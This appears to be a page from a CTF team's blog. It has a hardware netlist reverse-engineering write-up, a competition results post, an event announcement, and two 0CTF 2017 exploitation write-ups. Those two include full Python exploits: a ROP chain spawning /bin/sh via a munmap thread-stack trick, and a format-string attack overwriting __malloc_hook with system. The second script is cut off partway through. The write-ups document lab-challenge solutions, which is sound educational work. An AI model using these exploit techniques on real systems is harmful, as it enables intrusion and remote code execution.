Monday, October 23, 2017

Pwn2Win 2017 - Shift Register

Disclaimer: I am not an electronics engineer. I just play one on Twitter.
A lot of the following might be heresy to someone who ever actually dealt with silicon.

This Saturday, I woke up to the following on the Dragon Sector IRC channel:

<@valis> <@thotypous> where is q3k to solve my shift register?

Well okay, if you insist :D.

Introduction

Let's take a look at the task description:
ButcherCorp has developed an extremely reliable radiation-hardened IC packaging process. Its only drawback is requiring the ASIC to be fabricated using a specific 0.35μm technology, considered outdated by today's standards. The intel we gathered suggests that their standard cell library is based on osu035.One of our operatives managed to exfiltrate a GDSII file ButcherCorp has sent to a silicon fab. Apparently, it is the IC responsible for validating the launching code in their latest rocket engine.The IC samples the in pin at the clock's positive edge. If the correct sequence of bits is presented to the IC, it drives the unlocked pin to a high logical level. Find this sequence. It forms an ASCII string which you should submit as a flag.

So, we are given artwork of lithography masks for a VLSI ASIC (a.k.a. integrated circuit) fabricated in AMI 0.35µm technology using the Oklahoma State University OSU035 open source flow. The chip is a simple three-terminal device: a clock and in pin to receive a bitstream of a flag, and an unlocked pin that goes high if the bitstream is correct. We have to reverse engineer it to find the key.

The file is in GDSII/GDS2 format - an industry standard file format for exchange of lithography masks of integrated circuits, mostly used as en exchange format between EDA suites and as an output format given to silicon fabs by hardware designers.

The challenge ASIC is fabricated in Standard Cell technology - this means, in very simplified terms, that the software that converts a digital logic definition file (in RTL form) has a bunch of different 'cells' to choose from (ie. AND, NOT, D-Flip-flop, etc...), which it places in a grid and then connects with metal layers to form the final integrated circuit. The library of standard cells used in this task is OSU035.

A quick refresher on the physical topology of a VLSI circuit:
By Cepheiden, CC BY 2.5, via Wikimedia Commons
What we'll bee mostly looking at today is the 'BEOL' (back-end of line) section of the chip - the metal interconnect section that wires together the silicon (in the FEOL) of the standard cells together. These metal interconnects consist of a number of planes/layers with vias that connect them together and tungsten pins that connect them to the silicon of the lower layers.

Or, from a different perspective:
By David Caron, CC BY 3.0, via Wikipedia
The yellow part are the metal interconnects.

Let's load the mask in KLayout, an open source GDSII viewer:


Well, that's a bit of a soup. Let's copy over layer name/number mappings from osu_stdcells/lib/ami035/abstract/ami035_layers.map and reorganize them a bit. And zoom in a bit.


We can see the instantiated cells (for example, three 'LDCZ' cells on the top left) represented as boxes with their contents hidden (they are metal 1, pins and silicon layers), and global metal 1-4 layers and vias that join those layers together (visible). If we change display settings, we can peek into some of those standard cells and see how they're implemented.

Here we can see instances of the 'CNLZ' standard cell metal 1 layer (in red), instantiated multiple times into the design. Some of the instances which are flipped vertically (to fit them across power rails in the design) or horizontally (to better route metal signals).

But what is the logical function of this CNLZ cell? We could go about reverse engineering it at gate-level (by inspecting its' silicon layers). However, if we open osu035_stdcells.gds2 from the OSU035 files, we can see that it's in reality AND2X2 (a 2-to-1 AND gate), just renamed and oriented differently during instantiation.


We can now spend around half an hour and map the obfuscated cell names from the challenge GDSII into OSU035 cell names and their logical functions from the cell definition file. I also took the time to note down coordinate of the pins (i.e. A, B, Y, D, Q, CLK ...) and their names, so that we can map the I/O of the cells later on.


Now, here comes the hard part. We know what cells are used, and where. But we also want to know how they're connected, so we can reverse engineer the logic of the chip.

What we need is a netlist - a description of all the electrical nets in the design and how they connect all the logic cells together. There's a few ways to go about this:
Since I had no experience with any IC design EDA tools, I decided for the last option and wrote my own netlist extraction tool from scratch. I ended up with some pretty craptacular code, but it did the trick. So, without further ado, here's

How To Perform Netlist Extraction In Three Easy Steps

Step 1 - combine GDSII rectangles (boundaries) in all metal layers into 'segments'

In GDSII, every layer is just represented by a collection of rectangles (also called boundaries). There's no information on electrical connectivity, just a graphical representation in the form of boxes/boundaries of silicon layers, metal layers and via layers.

Our first job is to turn these into collections of rectangles on metal layers into objects that represent an electrically connected trace, which I called 'segment'.

Here's how I did it:
  • I loaded the GDSII file, transformed every metal rectangle into a slightly larger bounding box (because I wanted to use bounding box collision detection to connect metal boundaries that might be just slightly touching).
  • For every cell/structure of the design, I instantiated the structure's metal rectangles as well, after transforming them accordingly to flips/rotations.
  • For every metal layer of the design:
    • For every metal bounding box created above, I created a new Segment that's made up just of this metal bounding box.
    • For every segment, I try to find all other segments that touch it, and if so, merge the segments together. I repeated this until no more segments got combined.
      • This is the slowest part of the entire process. I tried to use a quadtree, but failed miserably.
This makes us end up with a set of segments per layer, where each segment is an electrically connected set of metal traces. We can then visualize all of the 4 metal layers separately, displaying each one of them in a different colour to check that they got merged correctly:


layer 49 - metal 1

layer 31 - metal 4
Looks promising.

Step 2 - combine segments together into nets that can span multiple layers

Now we want to start combining those segments across layers, if they connect via vias.

This is actually pretty easy. Here's my approach:
  • For every segment of every layer I wrapped it into a new Net. These nets, apart from containing rectangles, also have:
    • a name (autogenerated or using a predefined name if it starts at a know point, eg. one of the I/O pins)
    • a set of vias they go through (initially empty)
  • For every via in the design:
    • I found all rectangles that connect to it (on the neighbouring metal layers) and the nets in which they're contained. I then appended that via to the nets' via set.
  • I then join all nets by their common vias:
    • For every net in the design:
      • For every via in this net:
        • I merge the net with all other nets that contain this via.
By the end of this, we have a set of Nets that are mad up of electrically connected rectangles and vias, that span multiple metal layers. We can now render all of the nets to have an overview of all the metal layers in the chip:


We can finally start making some sense of the chip. For instance, the repeating horizontal and thick vertical traces are power rails. However, we're still just dealing with passive electrical connections, and no logic. Let's work on this next.

Step 3 - map nets to cells

We now want to create a representation of all the logic cells in this design, with their I/O pins mapped to nets. Here's how I went about this:
  • For every cell of the design, I calculated the absolute coordinates of the I/O pins that I mapped out earlier.
    • For every I/O pin, I find a net that contains it on a rectangle in metal layer 1. I map this net as that pin for this cell. I also back-map this the other way around - what pins on what cells is a given net connected to.
This leaves us with nice (albeit not super easy to traverse from a programming point of view) graph of nets and cells, connected together by the cells' I/O pins. We can generate our first netlist from this:


Hooray! We could go to town on this and feed it into a Verilog simulator and try to blackbox this netlist as is. But I used some extra automation to make my life easier.

Netlist Analysis

The first thing I did was prune all of the buffer cells from the netlist. The code is quite simple, I just find all buffers in the design and merge nets on the input and output:


This makes our netlist much nicer. Nice enough, in fact, to notice a few key facts:
  • All the D-flip-flops are clocked from the outside clock line synchronously
  • All the D-flip-flops are daisy-chained together via AND gates.
  • All the only other use of the D-flip-flops data outputs, apart from daisychaining, is to drive a large combinatorial network of logic gates that outputs the 'unlocked' signal.

This means that we're basically just dealing with a single large shift register fed from the 'in' and 'clock' lines and a bunch of combinatorial logic that checks its' state.

I then performed some extra analysis of the cells to find the actual stages of the shift register. I started from the 'in' signal, and looked for the next AND gate (sometimes implemented via INV/NOR gates) that would then feed the next flip-flop, which would then feed the next AND gate, etc:


This found 320 stages (all the D-flops in the design), which hints at a 40-byte ASCII encoded flag as the key.

The last and final step was to reverse engineer the combinatorial logic that checks the shift register outputs. Of course, I also automated that part. I traversed from the 'unlocked' net down recursively until I found either more gates, or one of the shift register stages (which I now knew to which bit of the key they corresponded). This let me build an AST of the expression that calculates the 'unlocked' value as a function of the shift register data.


Finally, I fed this AST (first converted back into assignment expressions) to the Z3 SMT solver to get the flag.


Summary

Extremely fun task, and mad props to its' author. I had a lot of tun writing the tooling from scratch over the weekend and highly recommend it as a practical exercise in algo coding. I will definitely take a closer look at EDA tools for VLSI, though :).

I definitely hope to see more challenges like these at other CTFs.

Saturday, May 20, 2017

CONFidence CTF 2017 - results and solutions

CONFidence CTF 2017 winners (source)
The competition during this year's CONFidence CTF 2017 was fierce, with a reshuffle in the top places happening quite often during the final hours. But there can be only one winner and in the end team baloom emerged victorious!

Full scoreboard - Click to zoom in
Final TOP 1-3:
  1. baloom (3220 pts) - 10000 PLN
  2. p4 (3170 pts) - 5000 PLN
  3. Teamless (3020 pts) - 2000 PLN
Congratulations to the winners and the runner-ups!

In total, there were 22 teams which solved at least one of the 20 tasks, and the competition lasted from 10am on the first day, to 3pm on the second, with an infrastructure break at night.

There were some fun tasks this year, including a NES RE challenge running on the actual hardware, hacking a drone and - even though it sounds trivial - printing a file on the CROOK OS running on the Polish Mera 400 '70 computer. If you're curious about the specifics of the challenges or the way to solve a specific task, we're publishing short descriptions of all the problems in form of a slide deck:


Finally, we would like to thank the CONFidence organizers for hosting the CTF for the forth year in a row! And I (gynvael) personally would like to thank my team for spending countless hours with little sleep to prepare the tournament, and doubly so the main CTF organizer - our acting captain - valis.

See you next year!










Monday, March 27, 2017

The CONFidence Teaser CTF takes place this weekend again!

This is just a short reminder that the CONFidence Teaser CTF organized by Dragon Sector will take place this weekend, and more specifically starting on the 2nd of April 2017, 00:30 CEST until 3rd of April 2017, 00:30 CEST.

The registration has just started at the event's website, https://ctf.dragonsector.pl/, and will stay open all throughout the game.

A quick rundown on the basic information is as follows:

  • Start: 02 April 2017, 00:30 CEST
  • End: 03 April 2017, 00:30 CEST
  • Duration: 24h
  • Format: online, jeopardy, team-based, no team size limit, teaser
  • Categories: web, re, pwn, crypto, forensics
  • Contact (IRC): #dragonsector @ irc.freenode.org
  • Contact (e-mail): ctf@dragonsector.pl

Prizes:

Top1 - Top3:
  • Travel allowance if coming to the offline event (up to 4*500 USD for European teams or 4*1500 USD for non-European teams)
  • 4 conference passes for CONFidence
  • Hotel for 4 people during CONFidence
Top4 - Top6:
  • 4 conference passes for CONFidence
  • Hotel for 4 people during CONFidence
Top7 - Top10:
  • 4 conference passes for CONFidence

See you on the battlefield!

Monday, March 20, 2017

0CTF 2017 - UploadCenter (PWN 523)

Welcome to another Menu Chall right~
Here you can use any function as you wish
No more words , Let't begin
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File

UploadCenter was a small service (x86-64, Linux) that allowed you to upload PNG files and do nothing with them. Well, that's not entirely true - you could list them (it would show you their width/height and depth), remove them and spawn two kinds of threads (one would inform you about any new uploads - i.e. when you would upload a file it would tell you that you've uploaded a file; and the second one would just list all the files in a different thread).

The PNGs themselves were kept on a linked list, where each node would contain (in short) some basic information about the PNG, a pointer to mmap'ed memory where the PNG was placed, and the size of said mmap'ed memory area.

The critical parts of the task were related to three menu options: 2 (upload), 4 (delete) and 6 (monitor), so I'll focus on them.

Starting with the most boring one, 4 :) Delete File function removed the specified PNG from the linked list, unmapped the memory chunk and freed all the structures (PNG descriptor, list node). As far as I'm concerned it was correctly implemented and for the sake of this write up the most interesting part was the munmap call:

        munmap(i->mmap_addr, i->mmap_size);

Going to the next function, 6 :) Monitor File spawned a new thread, which (in an infinite loop) waited for a condition to be met (new file uploaded) and displayed a message. It basically boiled down to the following code:

  while ( !pthread_mutex_lock(&mutex) )
  {
    while ( !ev_file_added )
      pthread_cond_wait(&cond, &mutex);
    ...
    puts("New file uploaded, Please check");
    ...
  }

And the last, and most important part, was the 2 :) Upload and parse File function, which worked in the following way:

  1. It asked the user for a 32-bit word containing data size (limited at 1 MB).
  2. And then received that many bytes from the user.
  3. Then inflated (i.e. zlib decompressed) the data (limited at 32 MB).
  4. And did some simplistic PNG format parsing (which, apart from the width and height, could basically be ignored).
  5. After that it mmap'ed an area of size width * height (important!) and copied that amount of decompressed data there.
  6. And then it set entry->mmap_size to the size of decompressed data (so there was a mismatch between what was mapped,and what would be unmapped when deleting).

So actually what you could do (using functions 2 and 4) is unmap an adjacent area of memory to one of the PNG areas. But how to get code execution from that?

At this moment I would like to recommend this awesome blogpost (kudos to mak for handing me a link during the CTF): http://tukan.farm/2016/07/27/munmap-madness/

The method I used is exactly what is described there, i.e.:

  1. I've allocated two 8 MB areas (i.e. uploaded two PNGs), where one area was described correctly as 8 MB and the other incorrectly as 16 MB block, 
  2. I've freed the correctly allocated one (i.e. deleted it from the list).
  3. And then I used option 6 to launch a new thread. The stack of the new thread was placed exactly in the place of the PNG I just unmapped.
  4. And then I've unmapped the second PNG, which actually unmapped the stack of the new thread as well (these areas were next to each over). Since the thread was waiting for a mutex it didn't crash.
  5. At that moment it was enough to upload a new 8 MB PNG that contained the "new stack" (with ROP chain + some minor additions) for the new thread (upload itself would wake the thread) and the woken thread would eventually grab a return address from the now-controlled-by-us stack leading to code execution.
At that point my stage 1 ROP leaked libc address (using puts to leak its address from .got table) and fetched stage 2 of ROP, which run execve with /bin/sh. This was actually a little more tricky since the new thread and the main thread were racing to read data from stdin, which made part of my exploit always end up in the wrong place (and this misaligned the stack_) - but its nothing that cannot be fixed with running the exploit a couple of times.

And that's it. Full exploit code is available at the end of the post (I kept the nasty bits - i.e. debugging code, etc - in there for educational reasons... I guess).


 +--^----------,--------,-----,--------^-,
 | |||||||||   `--------'     |          O
 `+---------------------------^----------|
   `_,---------,---------,--------------'
     / XXXXXX /'|       /'
    / XXXXXX /  `    /'
   / XXXXXX /`-------'
  / XXXXXX /
 / XXXXXX /
(________(        007 James Bond
`------'
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File
1 :) Fill your information
2 :) Upload and parse File
3 :) Show File info
4 :) Delete File
5 :) Commit task
6 :) Monitor File
ls -la
total 84
drwxr-xr-x  22 root root  4096 Mar  9 11:42 .
drwxr-xr-x  22 root root  4096 Mar  9 11:42 ..
drwxr-xr-x   2 root root  4096 Mar  9 11:45 bin
drwxr-xr-x   3 root root  4096 Mar  9 11:48 boot
drwxr-xr-x  17 root root  2980 Mar  9 13:10 dev
drwxr-xr-x  85 root root  4096 Mar 19 14:12 etc
drwxr-xr-x   3 root root  4096 Mar 18 17:49 home
lrwxrwxrwx   1 root root    31 Mar  9 11:42 initrd.img -> /boot/initrd.img-3.16.0-4-amd64
drwxr-xr-x  14 root root  4096 Mar  9 11:43 lib
drwxr-xr-x   2 root root  4096 Mar  9 11:41 lib64
drwx------   2 root root 16384 Mar  9 11:40 lost+found
drwxr-xr-x   3 root root  4096 Mar  9 11:40 media
drwxr-xr-x   2 root root  4096 Mar  9 11:41 mnt
drwxr-xr-x   2 root root  4096 Mar  9 11:41 opt
dr-xr-xr-x 112 root root     0 Mar  9 13:10 proc
drwx------   4 root root  4096 Mar 19 14:12 root
drwxr-xr-x  17 root root   680 Mar 19 14:07 run
drwxr-xr-x   2 root root  4096 Mar  9 11:49 sbin
drwxr-xr-x   2 root root  4096 Mar  9 11:41 srv
dr-xr-xr-x  13 root root     0 Mar 17 21:12 sys
drwx-wx-wt   7 root root  4096 Mar 20 05:17 tmp
drwxr-xr-x  10 root root  4096 Mar  9 11:41 usr
drwxr-xr-x  11 root root  4096 Mar  9 11:41 var
lrwxrwxrwx   1 root root    27 Mar  9 11:42 vmlinuz -> boot/vmlinuz-3.16.0-4-amd64
cat /home/*/flag
flag{M3ybe_Th1s_1s_d1ffer3nt_UAF_Y0U_F1rst_S33n}

The exploit (you'll probably have to run it a couple of times):

#!/usr/bin/python
import sys
import socket
import telnetlib 
import os
import time
from struct import pack, unpack

def recvuntil(sock, txt):
  d = ""
  while d.find(txt) == -1:
    try:
      dnow = sock.recv(1)
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

def recvall(sock, n):
  d = ""
  while len(d) != n:
    try:
      dnow = sock.recv(n - len(d))
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d        
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

# Proxy object for sockets.
class gsocket(object):
  def __init__(self, *p):
    self._sock = socket.socket(*p)

  def __getattr__(self, name):
    return getattr(self._sock, name)

  def recvall(self, n):
    return recvall(self._sock, n)

  def recvuntil(self, txt):
    return recvuntil(self._sock, txt)  

# Base for any of my ROPs.
def db(v):
  return pack("<B", v)

def dw(v):
  return pack("<H", v)

def dd(v):
  return pack("<I", v)

def dq(v):
  return pack("<Q", v)

def rb(v):
  return unpack("<B", v[0])[0]

def rw(v):
  return unpack("<H", v[:2])[0]

def rd(v):
  return unpack("<I", v[:4])[0]

def rq(v):
  return unpack("<Q", v[:8])[0]

def upload_file(s, fname):
  with open(fname, "rb") as f:
    d = f.read()

  return upload_string(s, d)

def png_header(magic, data):
  return ''.join([
    pack(">I", len(data)),
    magic,
    data,
    pack(">I", 0x41414141),  # CRC    
  ])

  
def make_png(w, h):
  return ''.join([
    "89504E470D0A1A0A".decode("hex"),  # Magic
    png_header("IHDR",
      pack(">IIBBBBB",
        w, h, 8, 2, 0, 0, 0  # 24-bit RGB
    )),
    png_header("IDAT", ""),
    png_header("IEND", ""),
  ])   


def upload_png(s, w, h, final_sz, padding="", pbyte="A"):
  png = make_png(w, h)
  while len(png) % 8 != 0:
    png += "\0"
  png += padding
  print len(png), final_sz
  png = png.ljust(final_sz, pbyte)
  png = png.encode("zlib")

  if len(png) > 1048576:
    print "!!!!!!! ZLIB: %i vs %i" % (len(png), 1048576)

  s.sendall("2\n")
  s.sendall(dd(len(png)))
  s.sendall(png)
  print s.recvuntil(MENU_LAST_LINE)

def upload_string(s, d):
  z = d.encode("zlib")
  s.sendall(dd(len(z)))
  s.sendall(z)

def upload_file_padded(s, fname, padding):
  with open(fname, "rb") as f:
    d = f.read()

  return upload_string(s, d + padding)

MENU_LAST_LINE = "6 :) Monitor File\n"
READ_INFO_LAST_LINE = "enjoy your tour\n"

def del_entry(s, n):
  s.sendall("4\n")
  s.sendall(str(n) + "\n")
  print s.recvuntil(MENU_LAST_LINE)

def spawn_monitor(s):
  s.sendall("6\n")
  print s.recvuntil(MENU_LAST_LINE)


def set_rdi(v):
  # 0x4038b1    pop rdi
  # 0x4038b2    ret
  return ''.join([
    dq(0x4038b1),
    dq(v)
  ])

def set_rsi_r15(rsi=0, r15=0):
  # 0x4038af    pop rsi
  # 0x4038b0    pop r15
  # 0x4038b2    ret
  return ''.join([
    dq(0x4038af),
    dq(rsi),
    dq(r15),    
  ])

def call_puts(addr):
  # 0400AF0
  return ''.join([
    set_rdi(addr),
    dq(0x0400AF0),
  ])

def call_read_bytes(addr, sz):
  # 400F14
  return ''.join([
    set_rdi(addr),
    set_rsi_r15(rsi=sz),
    dq(0x400F14),
  ])

def stack_pivot(addr):
  # 0x402ede    pop rsp
  # 0x402edf    pop r13
  # 0x402ee1    ret
  return ''.join([
    dq(0x402ede),
    dq(addr - 8)
  ])

def call_sleep(tm):
  return ''.join([
    set_rdi(tm),
    dq(0x400C30),
  ])


def go():  
  global HOST
  global PORT
  s = gsocket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((HOST, PORT))
  
  # Put your code here!

  
  print s.recvuntil(MENU_LAST_LINE)

  #s.sendall("1\n")
  #s.sendall("A" * 20)
  #s.sendall("1\n")
  #print s.recvuntil(READ_INFO_LAST_LINE)

  #s.sendall("0000000000000001A")
  #s.sendall("B" * 1)  # 2, 8
  #time.sleep(0.5)
  #s.sendall("1\n")
  #d = s.recvuntil(READ_INFO_LAST_LINE)
  #print d
  #sth = d.split(" , enjoy your tour")[0].split("Welcome Team ")[1]
  #print sth.encode("hex")


  upload_png(s, 10, 10, 0x1000)

  upload_png(s, 1, 8392704, 8392704) # 1
  upload_png(s, 1, 8392704, 8392704 + 8392704)
  del_entry(s, 1)

  spawn_monitor(s)

  del_entry(s, 1)
  
  # Now we hope that not all threads run.

  padding = []
  for i in range((8392704 - 128) / 8):  # ~1mln
    if i < 900000:
      padding.append(dq(0))
    else:
      padding.append(dq(0x4141414100000000 | i))

  padding[0xfffd9] = dq(0x0060E400)
  padding[0xfffda] = dq(0x0060E400)

  del padding[0xfffdd:]

  VER = 0x4098DC
  VER_STR = "1.2.8\n"

  CMD = "/bin/sh\0"
  #CMD = CMD.ljust(64, "\0")

  rop = ''.join([
    call_sleep(1),
    call_puts(VER),
    call_puts(0x060E028),
    call_puts(0x060E029),
    call_puts(0x060E02A),
    call_puts(0x060E02B),
    call_puts(0x060E02C),
    call_puts(0x060E02D),
    call_puts(0x060E02E),
    call_puts(0x060E02F),
    call_puts(VER),
    call_read_bytes(0x0060E400, 512 + len(CMD)),
    stack_pivot(0x0060E410)
  ])

  padding.append(rop)
  padding = ''.join(padding)

  #print "press enter to trigger"
  #raw_input()
  print "\x1b[1;33mTriggering!\x1b[m"
  upload_png(s, 1, 8392704, 8392704, padding)

  s.recvuntil(VER_STR)
  puts_libc = ''
  for x in s.recvuntil(VER_STR).splitlines():
    if len(x) == 0:
      puts_libc += "\0"
    else:
      puts_libc += x[0]
    if len(puts_libc) == 8:
      break

  puts_libc = rq(puts_libc)
  LIBC = puts_libc - 0x06B990
  print "LIBC: %x" % LIBC

  rop2 = ''.join([
    #dq(0x402ee1) * 16,  # nopsled
    dq(0x401363) * 16,
    set_rsi_r15(0x0060EF00, 0),
    set_rdi(0x0060E400 + 512),
    dq(LIBC+0xBA310), # execve
  ])

  rop2 = rop2.ljust(512, "\0")
  rop2 += CMD * 16

  s.sendall("PPPPPPPP" + rop2 + (" " * 16))
    

  # Interactive sockets.
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()

  # Python console.
  # Note: you might need to modify ReceiverClass if you want
  #       to parse incoming packets.
  #ReceiverClass(s).start()
  #dct = locals()
  #for k in globals().keys():
  #  if k not in dct:
  #    dct[k] = globals()[k]
  #code.InteractiveConsole(dct).interact()

  s.close()

HOST = '202.120.7.216'
PORT = 12345
#HOST = '127.0.0.1'
#HOST = '192.168.2.218'
#PORT = 1234
go()



0CTF 2017 - EasiestPrintf (PWN 150)

The task, as the name implies, was a rather basic (at first glance - there was a plot twist) format string bug in a short 32-bit Debian application. The initial description of the task was:

---
Warm UP! A traditional Format String Attack.
202.120.7.210 12321

http://dl.0ops.net/EasiestPrintf
---

And it later was upgraded (without me noticing 😭; though in all fairness it didn't change much) to:

---
Warm UP! A traditional Format String Attack.
It's running on Debian 8.
nc 202.120.7.210 12321

http://dl.0ops.net/EasiestPrintf
http://dl.0ops.net/libc.so.6_0ed9bad239c74870ed2db31c735132ce
---

The code itself was rather simple and boiled down to the following steps:

  1. Turn off buffering for stdin/stdout/stderr and setup alarm for one minute (a rather usual thing in CTF tasks).
  2. Manually randomize the stack address by doing a 16-byte aligned alloca().
  3. Get one decimal number (address) from the user and print in hexadecimal a 32-bit word from that address (an explicit leak).
  4. Read up to 159 bytes into a buffer on the stack (or up until \n was encountered, whichever came first) and do a printf(buffer) on it.
  5. Call exit(0) immediately after printf.

The manual ASLR from the second point could actually be ignored (at least I didn't find it annoying in any way) and the explicit leak from third point had to be used to leak the address of libc (or, to be more accurate, leak one of the addresses of resolved functions from .got and calculate the address of libc based on that).

While a link to libc was added later to the task description, I didn't notice until after I already solved the challenge, so I had to use the usual method of leaking 2-3 addresses from .got (in my case these were read, close and alarm) and look up the libc in our database of libcs (a good thing toi have). This resulted in finding exactly one library that matched all three addresses (or rather all three 12-bit lowest parts of the addresses) and giving me exactly one libc. And exactly zero ld-linux.so.2, which meant I couldn't debug the application locally, but I didn't care that much either (if possible I prefer to solve the tasks straight on the challenge server - way less problems with differences in the environment).

After having the libc the rest I had to do was create a format string which would overwrite .got exit entry with the address of a ROP gadget that would pivot the stack to my buffer and thus launch a ROP chain that runs system("/bin/sh"). Done, right?

Wrong.

It turned out that .got was read-only.

This started a 3 hour long journey to find a way to overwrite something that will give me control over EIP. The fact that immediately after printf() returned exit() was called didn't make things easier. The things I tried on the way:

  • Destructor tables in main binary and libc - nope, read only.
  • The atexit list - nope, pointer encrypted, don't know the secret value.
  • stdout's function vector table - nope, read only (one thing I didn't try was to change the address of the vector table itself).
  • A few function pointers that might be called on exit in libc - nope, read only.
  • The return address of printf itself - nope, no idea where the stack is.

Finally I recalled that libc has memory allocation hooks (__malloc_hook, __free_hook, etc) which are pointers to functions that are called when malloc or free are invoked. Luckily these pointers were not encrypted (i.e. due to the nature of how these are used/set up by the programmer - global function pointers that are to be overwritten - they cannot be encrypted).

However, does printf really use malloc?

At first I though about the $ positional markers - when the glibc's printf implementation encounters them, it create a copy of the argument from the stack (it needs a lookup table, and the usual vararg accessing methods don't provide such option). But it turned out it uses alloca() (i.e. on stack allocation) to do it (snippet from glibc-2.19/stdio-common/vfprintf.c):


  /* Here starts the more complex loop to handle positional parameters.  */
do_positional: 
...
    /* Array with information about the needed arguments.  This has to
       be dynamically extensible.  */
    size_t nspecs = 0;
    /* A more or less arbitrary start value.  */
    size_t nspecs_size = 32 * sizeof (struct printf_spec);
    struct printf_spec *specs = alloca (nspecs_size);


But since I was already looking at printf's internals, I just grepped for "malloc" and "free" finding a couple of places where they are indeed called. The most promising one was related to the width specifier (you know, e.g. "%1234x" - 1234 is the width of the field) of any format field:


if (width >= sizeof (work_buffer) / sizeof (work_buffer[0]) - 32)
 {
   /* We have to use a special buffer.  The "32" is just a safe
      bet for all the output which is not counted in the width.  */
   size_t needed = ((size_t) width + 32) * sizeof (CHAR_T);
   if (__libc_use_alloca (needed))
     workend = (CHAR_T *) alloca (needed) + width + 32;
   else
     {
         workstart = (CHAR_T *) malloc (needed);


After both doing some experiments (looking when malloc is called and when it's not) and looking up this code within the libc binary, I found out that any width above 65535 - 32 actually causes a malloc (and then eventually a free) to be called. And that both the __malloc_hook and __free_hook are really called giving me EIP control.

Initially I wanted to overwrite the __free_hook with a gadget that would pivot the stack to my buffer to launch a ROP chain, but it turned out it's rather hard to do that (or at least my experiments failed; might be that it was 4am though). 

So in the end I resorted to using a method abusing the fact that __malloc_hook was actually called with the width (+32) as an argument, so I ended up doing the following:
  1. I've put "sh\0\0" in main binary's .data section.
  2. Then overwritten __malloc_hook with the address of system.
  3. And triggered the whole thing by using a "%WIDTHs" tag, where WIDTH was the address of said "sh\0\0" minus 32.
A small problem was that the address of the third byte of __malloc_hook contained the \n character, which broke my write-byte-by-byte method (i.e. "%hhn"), but it was enough to switch to a write-a-word method for that specific place (so the upper byte of the word overwrites the problematic byte).

And to my surprise, it worked with the first try (full exploit is at the end of the post):


gynvael:haven-windows> pwnbase.py
libc @  0xf75de000L
224 196 0xe0L
195 24803 0x61c3L
247 52 0x61f7L
224 124 0x6273
195 245 0x6368
97 152 0x6400
247 256 0x6500
120
Shell opened!
cat /home/EasiestPrintf/flag
flag{Dr4m471c_pr1N7f_45_y0u_Kn0w}


And that's it! I really liked this task especially due to the plot twist with r-x .got - it forced me to dig a little deeper then usually in the printf internals, which was pretty fun in the end.


P.S. Exploit (Python 2.7):


#!/usr/bin/python
import sys
import socket
import telnetlib 
import os
import time
from struct import pack, unpack

def recvuntil(sock, txt):
  d = ""
  while d.find(txt) == -1:
    try:
      dnow = sock.recv(1)
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

def recvall(sock, n):
  d = ""
  while len(d) != n:
    try:
      dnow = sock.recv(n - len(d))
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d        
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d      
      return False
    d += dnow
  return d

# Proxy object for sockets.
class gsocket(object):
  def __init__(self, *p):
    self._sock = socket.socket(*p)

  def __getattr__(self, name):
    return getattr(self._sock, name)

  def recvall(self, n):
    return recvall(self._sock, n)

  def recvuntil(self, txt):
    return recvuntil(self._sock, txt)  

# Base for any of my ROPs.
def db(v):
  return pack("<B", v)

def dw(v):
  return pack("<H", v)

def dd(v):
  return pack("<I", v)

def dq(v):
  return pack("<Q", v)

def rb(v):
  return unpack("<B", v[0])[0]

def rw(v):
  return unpack("<H", v[:2])[0]

def rd(v):
  return unpack("<I", v[:4])[0]

def rq(v):
  return unpack("<Q", v[:8])[0]

def go():
  global HOST
  global PORT
  s = gsocket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((HOST, PORT))
  
  # Put your code here!
  M1 = "Which address you wanna read:\n"
  s.recvuntil(M1)
  addr = 0x08049FD4  # alarm in .got
  s.sendall("%u\n" % addr)
  LIBC = int(s.recvuntil("\n").strip(), 16)
  LIBC -= 0xB6C70

  print "libc @ ", hex(LIBC)

  SYSTEM = LIBC + 0x3E3E0
  EBFE = LIBC + 0x24119  # Good for debugging.
  PUTS = 0x80485C0

  WHAT = SYSTEM
  WHERE = LIBC + 0x1A9408

  WHERE2 = 0x804A04C  # A writable address in .data.
  WHAT2 = rd("sh\0\0")

  fmt = ""
  fmt += dd(WHERE) + dd(WHERE+1) + dd(WHERE+3)
  fmt += dd(WHERE2) + dd(WHERE2+1) + dd(WHERE2+2) + dd(WHERE2+3)

  cnt = len(fmt)

  def getoffset(b, c):
    while c >= b:
      b += 256

    return b - c, b

  # First write (__malloc_hook with system).
  diff, cnt = getoffset(WHAT & 0xff, cnt)
  print WHAT & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%7$hhn"

  diff, cnt = getoffset((WHAT >> 8) & 0xffff, cnt)
  print (WHAT >> 8) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%8$hn"

  diff, cnt = getoffset((WHAT >> 24) & 0xff, cnt)
  print (WHAT >> 24) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%9$hhn"

  # Second write (.data address with "sh\0\0".
  diff, cnt = getoffset(WHAT2 & 0xff, cnt)
  print WHAT & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%10$hhn"

  diff, cnt = getoffset((WHAT2 >> 8) & 0xff, cnt)
  print (WHAT >> 8) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%11$hhn"

